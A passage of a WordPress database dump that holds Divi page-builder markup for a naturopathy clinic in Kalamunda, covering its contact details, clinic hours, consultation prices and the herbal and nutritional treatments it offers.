global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available.</span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2023-11-23 12:13:58','2023-11-23 04:13:58','',26,'https://verdenaturopathy.com.au/?p=400',0,'revision','',0),(401,1,'2023-11-23 12:18:14','2023-11-23 04:18:14','','Screenshot_20231123_121727_Instagram','','inherit','open','closed','','screenshot_20231123_121727_instagram','','','2023-11-23 12:18:14','2023-11-23 04:18:14','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg',0,'attachment','image/jpeg',0),(402,1,'2023-11-23 12:19:50','2023-11-23 04:19:50','','Screenshot_20231123_121916_Instagram','','inherit','open','closed','','screenshot_20231123_121916_instagram','','','2023-11-23 12:19:50','2023-11-23 04:19:50','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg',0,'attachment','image/jpeg',0),(406,1,'2024-02-28 18:17:28','2024-02-28 10:17:28','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $160\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $60\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" 